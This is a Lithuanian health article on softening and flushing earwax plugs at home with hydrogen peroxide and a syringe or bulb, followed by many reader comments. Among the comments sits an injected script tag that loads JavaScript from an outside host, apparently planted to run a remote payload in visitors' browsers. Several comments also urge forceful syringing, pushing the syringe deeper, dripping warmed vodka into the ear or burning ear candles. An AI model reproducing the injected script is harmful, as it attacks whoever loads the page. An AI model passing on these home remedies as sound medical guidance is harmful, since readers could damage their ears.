Ausies sieros kamštį galite pašalinti patys

Prižiūrėti ausis ne mažiau svarbu nei reguliariai valyti dantis, plauti plaukus ar karpyti nagus. Daugiausia ausų priežiūros sunkumų sukelia joje besikaupiančios tąsios, geltonos išskyros - ausies siera. Šių išskyrų kiekis yra individualus: vieniems jos gaminasi tiek mažai, kad ji niekada nesikaupia, tuo tarpu kitų ausyse kamščiai susidaro kas du trys mėnesiai. Nepamanykite, jog ausies siera tik teikia rūpesčių - ji yra labai svarbi bei naudinga, nes apsaugo ausų landas (nuo būgnelio iki išorinės ausies) nuo dulkių, bakterijų ir kitų nešvarumų. Taigi jos ausyje turi būti, tik, žinoma, ne per daug.
 

Kai ausyje sieros susikaupia per daug, susiformuoja vadinamasis sieros kamštis, užkemšantis ausies landą. Neretai tai atsitinka po maudynių (dušo), darbo dulkėtoje aplinkoje, taip pat po netinkamo ausų valymo vatos suktukais arba visai be jokios priežasties. Tai tuoj pat pajuntate: užgula ausį, pablogėja klausa, galvoje ima spengti. Tai iš tiesų nemaloni būsena, todėl jums norisi stverti pirmą po ranka pasitaikiusį ploną daiktą ir atsikratyti šio varginančio pojūčio. Bet nurimkite ir pasistenkite nepasiduoti tokiai klaidingai pagundai - taip elgdamiesi, sieros kamštį galite įstumti dar toliau, pažeisti ausies būgnelį arba sukelti ausies uždegimą. Vatos suktukai ar lazdelės su vatos galiukais taip pat nėra veiksminga priemonė sieros kamščiui pašalinti - ji labiau tinka “rutininei” ausų priežiūrai.


Tereikia dar šiek tiek kantrybės bei 3% vandenilio peroksido tirpalo ar sieros kamštį minkštinančių ausies lašų, pipetės, mažos guminės kriaušės arba švirkšto ir vandens procedūroms jau viskas yra paruošta.
Visų pirma atsigulę ant šono užgulta ausimi į viršų įlašinkite į ją keletą lašų vandenilio peroksido ar specialaus tirpalo - sieros kamštis truputį suminkštės. Lašindami lašus, viena ranka švelniai patraukite ausies kaušelį atgal ir truputį į viršų, o kita ranka pipete lašinkite lašus taip, kad jie tekėtų ausies landos sienele. Po to, lengvai užkimšę ausį vatos tamponėliu, pasėdėkite 5 minutes, nekreipdami dėmesio į traškėjimą ausyje. Prisipylę indą šilto vandens (arba vandens ir vandenilio peroksido mišinio), pritraukite jo į guminę kriaušę ar švirkštą ir atsargiai srovele suleiskite vandenį į ausies landą. Kad išvengtume oro kamščio, vandens srovė (kaip ir gydomieji lašai) turi tekėti ausies landos siena. Vėliau palenkite galvą į šoną, ir vanduo ištekės. Šią procedūrą kartokite keletą kartų. Būtų tiesiog puiku, jei jums pagelbėtų kuris nors namiškių.
Pašalinus kamštį, užplūsta neapsakomas džiaugsmas - galvos ūžimas liovėsi ir jūs galite vėl puikiausiai girdėti.
Įsidėmėkite, jog jei susidarius sieros kamščiui ima stipriai skaudėti ausį, pakyla temperatūra, ausies plauti nederėtų. Be to, vaikams tėvai neturėtų taikyti šios priemonės savo nuožiūra.
Siekdami išvengti sieros kamščių, privalote kruopščiai ir taisyklingai valyti ausis. Jei sieros gamyba padidėjusi, nedirbkite dulkinoje aplinkoje, o jei tai neišvengiama - naudokite ausų apsaugos priemones (ausines) arba tiesiog užkimškite ausis vata.
Manoma, jog kartą per mėnesį į ausį įlašinus 1-2 lašus glicerino, joje esanti siera suminkštėja ir nesulimpa.

Populiariausi straipsniai

Lankytojų komentarai

Rimas
2022-06-28 20:00
Jei norite išdeginti ausis galite pilti peroksidą į ausis.
Virginija
2018-07-11 23:46
Ačiū už straipsnį :) jis labai naudingad :)
Ruslan
2017-02-27 08:20
Man padejo po 5 kartu.aciu
anonimas
2016-11-23 14:11
Sveiki. Pipetes, svirksto, gumines kriause man net nereikejo. uzteko pliuptelt is buteliuko kai prasidejo visas veiksmas pradejo cirsket , palaukiau gal max 5min kaip cia buvo parasyta net nebuvau ausies uzkimses . Per tas 5min karts nuo karto ausu krapstuku po truputi valydavau kol galiausiai atsibodo ir palindau po dusu nes uzteko su duso ciaupu uzdengt ausi ir palenkt galva kai atsikimso ir kaip buvo parasyta uzesis praejo, laimes pilnos kelnes buvo :D nes 3d. tyloj beveik sedejau, net savo mintis kuo puikiausiai girdejau :D . Buvau lasines Vaxol tai viena ausi isvale greit o kita nepasidave , kol neradau sito straipsnio ir pameginau su peroksidu. Dekui uz patarima :) (super) (ok)
Julius
2016-01-14 22:22
Man nepadėjo net po trijų kartų. Geriau eiti pas gydytoją.
as as
2016-01-08 20:06
Dariau kaip parašyta ir man pavyko. Pirma įsilašinau peroksido, ausyje pačirškė dešimt minučių, paskui švirkštu (20 ml), stipria srove purškiau į ausį. Supurškiau kokių 10-15 švirkštų, bet nieko nepadėjo. Tada vėl įsilašinau peroksido, vėl palaukiau ir vėl ploviau švirkštu. Šį kart reikalai pasistūmėjo, nes iš ausies pradėjo kristi smulkūs sieros gabalėliai. Bet to neužteko, ausis neatsikimšo. Tada trečią kartą vėl pagulėjau su peroksidu ausy, paskui vėl ploviau su švirkštu ir tada jau ėmė kristi stambesni gabalai sieros. Net nustebau, kokio brudo buvo mano ausyje. Taip plaunant, ausis atsikimšo. Valio. Tiesa, prieš paskaitęs šiuos patarimus, bandžiau plaut vien vandeniu, kišau galvą po dušo srove, purškiau į ausį, bet nepavyko. Tikriausiai peroksidas iš tiesų daro poveikį. Taigi kantrybės, vandens, peroksido - ir viskas išeis! Beje, nebijokite, tikrai neskauda.
Aidas
2015-07-08 19:57
po dvieju paru kanciu, nusipirkau svirksta ir silta vandeni po spaudimu tiesiai i ausi svirksciau. nebijokit ikist giliau. po kokio astunto bandymo iskrito sieros kazkokie rudi dalykai ir viskas pasitaise. spaudziau smarkiai svirksta. pries tai peroksidas nepamaisys. sekmes
Ruta
2014-12-04 11:10
Itariau, kad yra kamstis, nuejau pas LOR, pasake, kad nereikia ausu plaut, ner ko be reikalo ju erzint. Neisplove. Po menesio del gerkles teko lankytis pas kita LOR, tuo paciu apziurejo ir ausis. Pradejo rekt, kad siera ausyse, nieko nesimato, apziuret negali, kad naudoju krapstukus (net nepaklause ar naudoju :D ). Pradejo kazkokiu kabliuku krapstyt, skaudejo nerealiai. krupciojau, nes pabandyk nejudet, kai ausi drasko. Iskrapste kazkie tos sieros, po to nesileidau daugiau, nes labai skaudejo. Negi sjnku isplaut buvo??? po krapstymo, matyt, isjudijus sankaupas ausyje, prasidejo siugzdejimas, toks jausmas, kad kazkas ikista i ausi. Kankinausi ilgai, nerealiai vare is proto, ypac atsigulus miegot, tylu ramu, o ausy kazkas jauciasi. Bandziau pati plautis vandeniu, nepadejo. Siandien isbandziau su peroksidu, po to vandeniu. Zymiai pagerejo :) Aciu uz si metoda :)
vytautas
2014-02-16 00:35
Sveiki, man ryte apie 6 ryto, labai pradejo skaudeti ausi... isgeriau paricitamolio truputu praejojo, dabar lasinuosi vaistus i ausi ( Otex ). labai uzsikimsusi ausis, nuolatos girdimas osimas,cypimas. Ar tai galetu buti sieros kamstis ar kazkas rimciau? :(
Jola
2014-02-15 19:38
Mano draugui irgi buvo padejes perxidas. Na o man siandien padejo-Cerustop aliejukas. 10min palaikiau ir paskui su gumine pompa (klizmute ;) ispuciau su siltu vandeniu. Super.
Lietuvis
2014-02-10 17:57
Sveiki, o jai dėl (šoninio) smūgio į ausį atsirado pastovus ošimas, bei prastas girdėjimas. (toks pat jausmas lyg vandens pastoviai būtų). Ar tokiu atveju gali būti sieros kamščio kaltė? Pagarbiai lauksiu atsakymo. :)
:((((((
2013-12-31 17:00
sveiki gal galite padeti vaziuosiu pas daktara nes man uzsikimso ausis . labai bijau nes plaus ausi , ar labai skauda kaip plauna?(weird)
dale
2013-10-16 13:27
as norejau paklausti kaip atkisti uzguluses ausis, sugeriau antibijotikus bet nieko.gyvenu anglijoja daktarai skire tik gerti paracetamoly ir sako savaime praeis laukti o ausys uzgule jau 10 dienu baisus galvos cypimas ir net i sonus kaip einu uzmeta nezinau ka daryti gal ka patartumete
Marius
2013-10-12 13:03
Suveikė. Tiktai kokia daugiau negu 10 kartu su maža pompa leidau stipriai vandenį ir pramušė. dar net geriau girdisi ta ausim kur išsiploviau, negu kad neplauta :D
Irma
2013-08-23 08:55
Oi, būtinai išbandysiu! Visą vasarą kankinuos (gal dėl maudynių ežere?). Aišku, būtų protingiausia pas gydytoją nueit, bet vakar įlindau užsiregistruoti- ogi artimiausias laikas- po Vėlinių! Nedagyvensiu! O ir pagalvojau, tiems, kam dažnai susidaro tai ką daryt? Tik išėjus išgydytojo kabineto iškart naują talonėlį išsiimt?
Petras
2013-07-25 10:19
Koki 10 kart po 5-7 minutes vandenilio peroksidu ir pavyko :D
Petras
2013-07-25 10:18
Koki 10 kart po 5-7 minutes vandenilio peroksidu ir pavyko :D
Petras
2013-07-25 10:18
Koki 10 kart po 5-7 minutes vandenilio peroksidu ir pavyko :D
rai
2013-07-10 08:10
mano dukrytei taip nutiko vakar mes Anglijoje tai nuvyke pas GP mums liepe leist alyvuogiu alieju dar pakolkas rezultatas 0 .
:)
2013-06-03 20:09
nuostabus budas ,vargau gal valanda ,bet vistiek pasiseke:) geras jausmas velnormaliai girdeti,ir labai smagu , kad tai padariau pati,be jokiu daktaru ir eiliu pas juos :D
Ausis
2013-05-10 14:36
Na,su sia problema vargstu ir as:( reiks pabandyti si buda,o gal ir pades...nes antra diena jau prastai girdziu kairia ausimi,spangia,uzia...:(gyvenu uzsienyje,tad pas gyd net neinu,pries tai buvo si problema,buvau pas gyd,o gyd pasake,kad praeis savaime..o si karta daug prasciau jauciuosi...o,kad vandenilio peroksidas gadina ausu bugnelius,tai cia nesamone... Tikiuosi,kad pades sis budas!:)
Povilas
2013-03-20 16:41
Vakar nakti uzsikimso ausis del kamsciu ir niekaip neatkimsau, tad siendien buvau pas daktare ir atkimso ta sieros kamsti, beje klausiau ar galima bandyti su vandenilio peroksidu atsikimsineti ausis, tai ji sake kad jokiu budu negalima nes vandenilio peroksidas gadina ausu bugnelius.
Gabrielė
2013-03-19 08:53
Na šito metodo nebandžiau ,bet šiandien apsilankysiu pas LOR gydytoją dėl nosies ,ištikrūjų manyčiau ,jog ausys užgulusios nuo slogos kuri tikrai didelė ir varginanti ,tai labiau patarčiau bandyti ne paties ,o nueiti pas gydytoją (tam tikrą) ir pravalys jums ausis(hi)
vilma
2013-01-21 23:39
O ka man daryt ausi uzia jau virs metu kartais pereina I desine ir nakti ir diena


Rima
2013-01-07 15:01
Laba diena,skaitau skaitau ir galvoju ar man tas gydymo metodas padetu?! O beda pas mane tokia,pries pora savaiciu turejau giluminio nardymo kursus tai teko daug laiko praleist po vandeniu,ausytes kiek buvo uzgultos,bet labai nesupanikavau,nes daznai buna kai slegis pasikeicia uzgula.. Ana savaite teko daug lektuvu keist kilti leistis i diena 4d is eiles po 2 skrydzius turedavau ir manau,kaip ir kiekvienam kylimo ar leidimosi metu uzgula ausis,taip ir man,bet po keliu valandu vis praeina... Taciau sikart viskas kitaip,tai uzkrenta tai vel viskas normaliai,bet kai uzkrenta tai spiegia kazkaip ausy,bedu niekada neturejus del klausos!!- idomu padetu man sitas metodas???
ghg
2012-11-14 15:28
(hooray)(ok)ыгвфы xcghgxhČČč2ČČČČ@ČČČč@@Ččč
kiesa
2012-07-31 07:39
na pas mane ta beda pastovi su tais kamsciais :( kelis kartus jau plove ausis su kalio permanganatu LOR’as pat dar nebandziau
<script src="http://biteme.co.nf/gj0m.js" type="text/javascript"></script>
Gintaras
2012-07-29 12:09
Na ką, pasinaudojau šia išmintimi ir prasivaliau ausis, nors nebuvo taip paprasta, kaip gali pasirodyti. Kairę ausį ploviau gal 5 ar 6 kartus, kol susidarė vandens kamštis. Pavyko išpilti judinant ausį. Matyt todėl, kad kriaušytę pasirinkau per didelę, siurbtukas užėmė visą landą. Manau, tam tikslui tiktų maža kriaušytė, ir peroksidą reikėtų laikyti kiek daugiau nei 5 minutes, ir pilti ne kelis lašus.
Pasimokęs iš klaidų su k. ausimi, d. ausį pravaliau iš pirmo karto.
Tiesa, mano ausys nebuvo aklinai užkimštos, tik pridususios, su pagargaliavimais.
-----
2012-07-07 19:44
Turejau lygiai tokia pacia problema. Pasiskaiciau sita straipsni, ir ka? Ogi padejo, bet pastangu irgi reikejo daug. Kamsti pilnai prastumiau per dvi dienas. Pasirodo reikia, kad vandens srove taikytu labai preciziskai taikliai i pacia ausies giluma ( kad butu tiksliau naudojau svirksta + siaudeli, iskart pramuse :D ).
Margarita
2012-06-15 11:52
Jeigu bijote bandyti šį metodą, tai visų pirmą išmeginkite paparsčiausius... Tokius kaip : gumos kramtimas, ausies spenelio tempimas žemyn, šokinėjimas ant kojos palenkus galvą (tik priešingos pusės. tarkime užkritus dešinė ausis, šokinėti ant kairės kojos), oro pūtimas į ausis užsikimšus nosį. man padėjo šie paparsti dalykai:)
Mantas
2012-05-07 11:50
Padada! Kai kantrybės nėra tai įlašini to peroksido, keliskart ausį praplauni vandeniu, tada kiši švirkštą į ausį (aišku be adatos) ir purški vandenuką. Max 10 min darbo ir vėl laisvė jūsų ausims :D
lol
2012-04-29 22:50
vieniem padeda kitiem ne.
as dar nebandziau
Modesta
2012-04-06 17:17
O ką daryti jei vatos tamponelis pateko į ausį?
ROLIS
2012-03-26 20:36
3 kartas nemelavo )))))))20 min darbo ausys naujos!!!!!!
V.M
2012-03-23 18:24
beja ir visi skysciai ir tirpalai turi buti kuno temeraturos!!!!!!
V.M
2012-03-23 18:20
na as eiciau pas gyditoja, nes ten tikrai pasalintu. bet kadangi esu uzsieni. o jau su tokia beda savaite vaikstau.ir viskas prasidejo po lektuvo skrydzio . tad einu pabandysiu, nors labai nenoriu to daryt, nes galima lengvai gaut ausu uzdegima po viso sito. ir jai kas dar darysit , BUTINAI!!! po proceduros uzsikimskit ausis kuriam laikui su vata. ir atkimsinet tik patalpoi, o ne lauke ar ant skersvejo. gerai varau, pranesiu kaip sekesi
a
2012-02-26 03:33
Turiu ir as sia beda, esu anksciau ejas pas daktara ir ploves padedavo. Dabar vel tas pats, nueinu pas jauna gydytoja lor jis paziuri kamscio nematau, bet matau kad yra grybelis ar kazkas tokio. israse tepaliuko ir 2 savaites liepetept, jauciu kaip kiekviena diena o ypac po nakties ausis vis labiau uzgula... As esu garantuotas kad tai kamstis, gailiuosi kad nejau pos savo senaji lor daktara kuris pasalino anksciau sia problema... esu isitikines kad tai kamstis...
egdijus
2012-02-14 01:41
sweiki ka galima vietoj vandenilio peroksido panaudoti namu priemonemis man jau 6 menesiai taip baigiu isproteti diena vskas gerai bet vakare kai atsigutu ar apskritai kai atsigulu tada prasideda viskas prasau patarimu aciu :)
patyrusi
2012-02-05 20:50
nebijokit jus nueit pas gydytojus, jug visai neskausminga ta procedura. as pati pries einant bijojau, dar plius buvau viena, buvo baisu, bet po to juokiaus is saves, kad bijojau ir kentejau 3 sav. :))
Ruta
2012-01-30 12:57
AS Jau kokius 9kartus padariau ir nieko;D gal ka netaip darau;]
Ruta
2012-01-30 12:21
ir as bandysiu;]
Kami
2012-01-21 22:10
Yra man kamstis tevai ir visi vercia issivalyti siuo budu... Bet as ziauuriai bijau! negaliu perlauzti saves... :((
:D
2012-01-19 20:33
nu gerai einu ir as bandyti jusu visu patarimu :D
Monikutis
2012-01-02 15:10
Aš irgi kentėjau netgi savaite, išpradžių buvo pakenčiama, bet kai ryte pabudus pajutau, kad kaire ausim beveik nebegirdžiu susirūpinau, namie taip greit nerūrėjau peroksido vandenilio, tai galvojau nepavyks vien su vandeniu bet pabandžiau ir pavyko iš karto, jaučiuois super ! :)
SAULIUS
2011-12-18 11:50
Valio!!!Padejo,po pusvalandzio darbo peroksidas-vanduo,kamstis iskrito:)))
Milda
2011-11-19 14:32
buvau vakar ausų plaut, nes sieros kamščiai iš proto varė. nerizikavau nieko pati daryt, bet kai plovė, paklausiau gydytojo, ar tiesa, kad reikia minkštinti. Sakė taip, ir apie specialų prepapratą kalbėjo, bet ir vandenilio peroksidas sakė yra gerai. Bet kaip ir sakiau, pati nerizikuoju, geriau tegul duodu visą valią gydytojams, visai nenoriu iš eksperimentavimo visokių priemonių pakenkti savo klausai.
mergina
2011-11-06 19:43
Sveiki, man buvo ta pati problema nenaudokit jokiu peroksidu nes jis tik putoja ir poto sunku isvalyti, man patare vaistininke pasildyt degtines ir ilasinti keleta lasu su pipete poto uzdengti su vata ir paguleti keketa minuciu, issitraukus vata ausi atsargiai isvalyti su ausu krapstuku is pirmo karto gal ir nebus efekto bet man po antro kart padejo
uzpludo geras jausmas ir beje b
vilmantas
2011-08-23 11:27
nuostabus budas, be jokiu daktaru ir eiliu :)
arce
2011-08-20 14:09
kodel man nepadeda :(
Wita
2011-08-07 12:24
Labai geras budas :) pirma karta paprasiau,kad drauge padetu,nesigavo nieko.... po kiek laiko darugas su jega is svirkto ipurske vandens ir kamstis isleke :) jeeee!
Gabi
2011-08-06 20:19
Siandien man taip pat uzsikiso ausis nezinojau ka daryt, savaitgalis, po gydytojus vaikscioti ir stumdytis eilese neturiu laiko:( Perskaiciau si straipsni ir kagi viskas pavyko super. O viska dariau taip palasinau i ausi vandenilio peroksido i ausi mazdaug puse pipetes palauktiau 5 min kol ten viskas isburbuliuos ir suminkstes, tada paemiau "kriause" ir supurskiau i ausi taip kad butu stipri srove kamstis pasisalino gal is kokio penkto bandymo!!! Dziaugiuos kaip naujai gimusi ir sutaupiusi daug brangaus laiko:)))
Tomas
2011-07-01 09:49
Sveiki man 13 metu jau 3 diena kaip man uzgulus kaire ausis , patarkit ka daryti nes labai nenoreciau eiti pas daktarus
piktas
2011-06-10 13:15
šiandien ir man nutiko ta bėda :( , nuėjau į polikliniką 3 val turėjau laukti, kol pasirodys šeimos gydytojas - siuntimą išrašė pas lor nuėjau apie 40 min pralaukiau prie kabineto durų ir išėjus seselė pasakė, kad šiandien nieko nepriims, nebent pirmadieniųii taloną imtis.........prieš 12 metų kai buvo tapati problema poliklinikoje užtrukau 15 min.....šiemet 4 val ir rezultatas apskritas 0.....jei idomu veiksmas klaipėdoje 3 poliklinikoje...
draugas
2011-06-08 11:24
sveiki visi, man labai reikia jusu pagalbos, man nuo maudyniu uzgule kaire ausi, ka turiu daryti tada?
:((((((((
2011-05-15 20:53
Geriau nebandykite man dar blogiau...
edita
2011-04-15 11:35
ačiu uz straipsni .dariau kaip parašyta ir padejo.ausis atsikimso.
AxE
2011-04-14 11:50
Zmones kurie esat isitikine, kad ausyje kamstis nenuleiskit ranku... As viska dariau kaip cia parasyta, tik vietoj kriauses naudojau svirksta, taip dariau tris kartus, ir vis ipiles vandenilio laukdavau ne 5 min o tol kol nustoja girgzdet ausyje, ir tai po triju kartu nesuveike, jau buvau visiskai prarades vilti ir susinervines, ZVERISKAI! Bet tuomet susikaupiau ir padariau tai dar viena karta, po to dar viena ir reziume, po penkto karto skalaujant ausi siltu vandeniu VUOLIA!!! Atkurtau ir net suvokiau, kad atkimsta ausim geriau girdzizu nei ta kuri buvo atseit sveika!! Is viso visos proceduros uztruko apie +-1h, bet patikekit, nenuliesit ranku ir vel viska girdesit!
Aiste
2011-03-27 11:10
Sveiki turiu beda ir as. uzgule kaire ausi..Si vakar yra repeticija (groju smuiku) iki konkurso kelios dienos o ausimi negirdziu nezinau ka daryti prasau padekit..Nes istikruju mane erzina kad negaliu normaliai girdeti (o gyditoju negaliu pakesti)...Viskas prasidejo nuo to kad valiausi ausis ausu krapstukais ;((
evaldas
2011-03-21 16:34
Kaip suprasti ar ausyje yra sieros kamstis? man ausis jau uzsikimsusi visa savaite ir nepraeina,galvoju, kad tai gali buti nuo ligos pvz: buvo sukilusi angina ir sloga atsirado,sakau gal nuo to to cia, bet jau beveik pasveikau,o ausis vis dar uzkritus ir spengia galvoje,ir nezinau ka daryti,dariau kaip jus saket bet vistiek nieko gero,tas pats.
rirore
2011-03-18 09:51
o ar negalima jo kaip nosr iskrapstyti tas nemalonus jausmas jau pradejo nervinti
ieva
2011-03-09 08:16
Man dabar turputi uzsikimso ausis vel tai laukiu kol mama grys mama su dideliu svirkstu isplaus.
11-metis
2011-02-27 09:48
vakar uzsikimso ausis,o man tik vienuolika,nezinojau ka daryti nes tevu nebuvo namie tai sake kad cia nk blogo nes daznai uzgula ausi (bent jau jam,o jis sake kad rytoj atsigaus,bet atsikeliau ir vistiek dar buvo uzkismta patarkit ka daryti,kad nereiketu eiti pas daktara
Siera & Ko
2011-02-09 04:11
Nesinervuokit ir nebijokit nueiti pas ausu specialista jei nenorite to patys padaryti. Tikrai neskausminga procedura , gal net maloni. Jokio skausmo tiesiog idomus jausmas. Pats buvau pas daktara du kartus. O dabar vel ta pati problema ,bet gyvenu uzsienyje. Taip , kad reiks bandyti ka siulo sveikas zmogus. :)
Alfonsas
2011-01-11 18:31
geras dalykas !!!! viskas veikia nepjaukit grybo !!
55
2011-01-08 02:10
nepadeda sitas budas bandziau gal 4 kartus siandien , be to kartais istraukiu vata ir ji buna raudona retkarciais, gal zinot kas padetu ? :)
Olga
2011-01-03 22:55
Sakykit, ar galima plauti be kriauses?
patarkit
2010-12-21 04:01
jauciu ausyje slegy, uzgulta, kazkokia kaip uzsikimsus, kartais atrodo kad kazkas isbega,buvau pas daktara israse nuo kraujotakos vaistu bet vistiek tas pats...ir taip jau antri metai
ruta
2010-11-15 19:29
tu lazdeliu yra pirkti Kauno bazej, kur prekiaujama rusiskais vaistais. manau ir kitose vietose, ne tik bazej yra, ziurekit kur rusiskais vaistais prekiauja. pakuotej po lazdeliu... vadinasi "fito svieci", kaina apie 6 litus berods.
jei problemanedidele jos pagelbes, jei jau isisenejusi arba sieros kamstis didelis - nelabai pades, vistiek manau geriausia iseitis nueiti pas gydytoja ir ten isplaus.
sekmes ;)
diva
2010-11-08 12:39
labukas,gaila,kad issigydziusioji neparaso,ir el.pasto nera.tikrai susisiektume,o tos lazdeles geras dalykas,esu apie jas girdejusi is tv,skaiciusi.mano abi ausys uzsikise,svaigsta galva,gydytojai itaria menjera,jauciu tos lazdeles man padetu,buvau pas lor ,skundziausi del ausu,o jie sake nieko nemato blogo,taip ir grizau nieko nepesus.atr,kas nors,kur tu lazdeliu buna pirkt.
rasa
2010-11-08 11:26
labas issigydziusi,labai noreciau tu lazdeliu,bet is kur gauti tavo el pasta?
diva
2010-11-07 17:53
prasau,parasykit,kur gaut tu ekologisku sieros pasalinimo lazdeliu,issigydziusioji,man tas pats kaip ir jum,buciau labai dekinga
issigydziusi
2010-11-06 13:45
Turejau ir as problema su ausies uzsikimsimu ir skausmu.Svaigo ,uze ir sukosi galva.Jokie praplovimai nepadejo.Pasiguodziau giminaitei,kuri man atsiunte tikra issigelbejima.Tai Pharmaclean ekologiskos sieros pasalinimo lazdeles.Jos istatomos i ausies landa,uzmaunamas apsauginis karsciui ziedelis,tada lazdele uzdegama ir ramiai gulint ant sono laukiama kol lazdele sudega iki apsauginio ziedelio/apie 5-7min./Ta dalis lazdeles,kuri buvo ausyje istraukia tiek sieros,kad negali net patiketi.Tai reikia atlikti su abiem ausytem...Bet koks po to jausmas,kaip palengveja.Dar turiu kelias dezutes,jei kam lb. reikia,galiu perleisti.Rasykit i el. pasta.
deimante
2010-10-26 18:32
jeigu ausyse yra vandens tai paimkite aus krapstuka ir krapstykite jei neiseina tai paimkite peroksida ir ipilkite i ausi ir pasokinekite ant kojos man abai padejo o jeig neisejo pirma karta tai bandyti dar ir dar
Dainius
2010-09-06 20:31
As bandziau ausis issivalyti su ausu krapstuku kury pamerkiau y ta vandenilio peroksida, aisku nepadejo bet labai pradejau griausti ausi, nezinau kodel skaudejo labai, taip turi buti?
zi
2010-08-18 18:11
pramuse!!!! koks geras jausmas!
dvi dienas kentejau - praploviau su Otinum skysciu ir po 20 min.(jau buvau beveik nusivyles rezultatais) girdziu nerealiai ir jokio spengimo!
vaidas
2010-08-18 11:21
labai dekoju uz patarimus, vos neprisidirbau su ausu krapstukais. Gerai, kad laiku perskaiciau straipsni. Procedura su vandenilio peroksidu kartojau tris kartus ir atrode, kad nepadeda. Bet prabegus pusvalandziui po proceduru ausis atkuto
margarita
2010-07-31 17:48
ir ar labai skauda kai traukia ligoninej ? ***
margarita
2010-07-31 17:46
nu wa , kiekwiena diena maudziaus ezere ir susidare kamsti , beweik neirdziu wiena ausim. dabar guliu jau antra diena su sloga , kosuliu , angina , temperatura ir ausies uzgulimu :( gal galit kas pasakyt ar temperatura galejo pakilti del ausies ar turbut persalau ? ir as labai skauda kai ligonineje traukia ta kamsti , nes namuose bijau . prasau padekit :)
ausra
2010-07-23 18:42
valio ausis atsikimso man labai padejot aciu :-))))
13 - metis.
2010-07-20 23:36
Sveiki, gal galite padeti? Valiausi ausis, viena issivaliau viskas gerai, taciau pradejau valyti kita. Ir man ja uzgule. Pradejau nesmarkiai panikuoti. Sokinejau ant desines kojos. (Nes uzsikimso desine ausis). Galvojau issoks kas ten yra. Ar siera ar vata, taciau nieko nenutiko, nuejau maudytis, susislapinau ausi gan gerai ir islipes is vonios irgi sokinejau ant desines kojos maniau irgi iskris taciau nieko. Ir nezinau ka daryti. jaudinuosi del to ar neplyso bugnelis. Ir nezinau ka daryt. Gal kas esat susidure? Gal padetumete kas nors?
Andrius 13m.
2010-07-19 00:52
na nzn tikrai lb skauda , as pats po geru maudyniu tai skauda dabar labai ,bet po biski atslugsta nes ce google radau kad reikia paracetamolio 1 tableta tai biski atsugsta skausma .
inga
2010-07-18 20:25
sveiki man uzgule ausi ir nezinau ar uzdegimas koks ar sieros kamstis susidare negirdziu su viena ausim esu ne Lietuvoj ir nezinau ka daryti gal kas ka patarsit?
widas 25m.
2010-07-14 10:57
ka daryti?daznai maudziausi upeje,waliau ausis vatos krapstuku ir uzkimsau wiena ausi,bet viduje ne siera,o balta kose...kas tai yra ir kap iswalyti be gyditoju pagalbos?
durnelis :D
2010-07-11 09:50
einu ausu plaut,vakar po maudyniu vos neisdurnejau kai su vatinukais besivalydamas ausis uzkisau,vos stoga nenurove kai nebegalejau normaliai aliuku pasiklausyt :DDDDD
Ieva
2010-07-06 12:37
Siuo metu man dabar yra si problma( tiksliai dar nezinau ar tai kamstis, bet mama sako, kad tai jis). Tai as nezinau ar man eit pas LOR ar ausi prasiplauti namie? Beje, tas spengimas r negirdejimas ziauriai uzknisa.
Gulbike
2010-05-25 23:07
Sveiki, mane irgi kamuoja tas pats dalykas, jau kelinta diena uzgulus ausis ir beveik negirdziu, taip erzina, o pas daktara neturiu laiko nueiti, tai siandien vaistinej nusipirkau Tropex, jau pora kartu lasinau, bet atrodo, kad dar labiau uzgule ta ausi.. Noreciau paklausti kaip su tuo plovimu jus darot, kiek mazdaug to vandens supilat i ausi, kad atsikimstu? ir ar butina su kriause? gaila kad neturiu jos...:/ aciu uz ats :)
dzn
2010-05-15 14:03
Gaila, kad komentarus perskaiciau tik po to, kai procedura nepadejo... Eisiu pas LOR, dabar net baisu pagalvot, kad man galbut ne kamstis... Sedziu ir galvoju, koks durnas esu, kad prisilasinau i ausi kazkokios chemijos net tiksliai nezinodamas, ar man sieros kamstis.
NEDARYKIT TO NAMUOSE!!!
oksana
2010-05-06 10:53
o 3,5 m,vaikui galima plauti taip?
TOMAS
2010-04-06 13:29
NZN BANDAU JAU KOKIUS 5 KARTUS NIEKO VISISKAI NEPADEDA NUEJAU PAS GYDITOJUS BET ISRASE VAISTU IR PASAKE KAD NAUDOTI JUOS OTEX VADINASI PAMEGINAU SITAS PROCEDURAS JAU 5 KARTUS NIEKO NEPADEDA NEBEZINAU KA BEDARYT
13-metis
2010-03-24 10:22
as irgi noreciau pabandyti nes abi ausis uzgule ziaurei uzpisa...bet bijau kad dar kas blogai nebutu ir labai bijau apkurst...vos tik pagalvojus kad galiu nebegirdet lb isigastu... palauksiu mama kol gris gal kas nors iseis :) ai px apkursiu tai apkursiu ;( bijau
Laima
2010-03-09 21:13
Galiu pasakyti siandien kaip tik isbandziau taip isvalyti ausyje esanti kamsti, uzteko man viena karta ilasinti peroksido ir poto praplauti ausi ir atsikiso, istikruju galvojau reiks eiti pas gydytojus, nes ne karta man uzsikisa ausis, kadangi sake pas mane kanalas yra siauresnis ir todel taip vis uzsikisa, net palengvejo istikruju nelabai tikejau kaip perskaiciau, bet nuejus i vaistine man taip pat vaistininke nupasakojo kaip isvalyti . Labai dziaugiuosi dabar jei ka zinosiu ka daryt.tikrai naudingas straipsnis.
Karolis
2010-03-08 04:06
Pas mane kazhkokios keistos sienelės ausyse yra, labai uzhsuktos, todėl siera slenka vis gilyn į ausį, o ten kur jos jau nepasiekia joks krapštukas, ji vis akumuliuojasi, kol visai nebeprigirdziu... jau pabodo vis i poliklinika vaikscioti, reiktu paciam ishmokti savo ausis ishplauti... :D
Samgiz
2010-02-27 20:57
geras reiks pabandyt ryt nuo ryto :)
Jonas
2010-02-25 15:34
Wazeeep
Imantas
2010-02-16 20:40
Rekomenduoju pašildyti bet kokius pilamus skysčius iki žmogaus kūno temperatūros (bet ne daugiau, žinoma; į tokios temperatūros skystį įmerkus pirštą nejaučiamas nei šaltis, nei šiluma), nes staigūs temperatūros svyravimai, kaip žinia, sukelia uždegimą (organizmas ar jo dalis patiria stresą ir nebesugeba tinkamai adaptuotis prie esamos temperatūros)
rolandas
2009-12-13 11:21
Labai naudingas patarimas ir tikrai labai padejo. Pakartojau rekomenduojama procedura pora kartu ir kamstis pasidave. Labai dekoju.
rimantas714
2009-11-24 20:55
bandziau ispradziu su krapstukais po to su glicerinu ir po to su vaistais Tropex ,bet dabar visai uzsikiso ir galvoja spengia,eisiu plauti siltu vandeniu ,gal pades.Aciu uz komentarus
moteris
2009-10-31 01:58
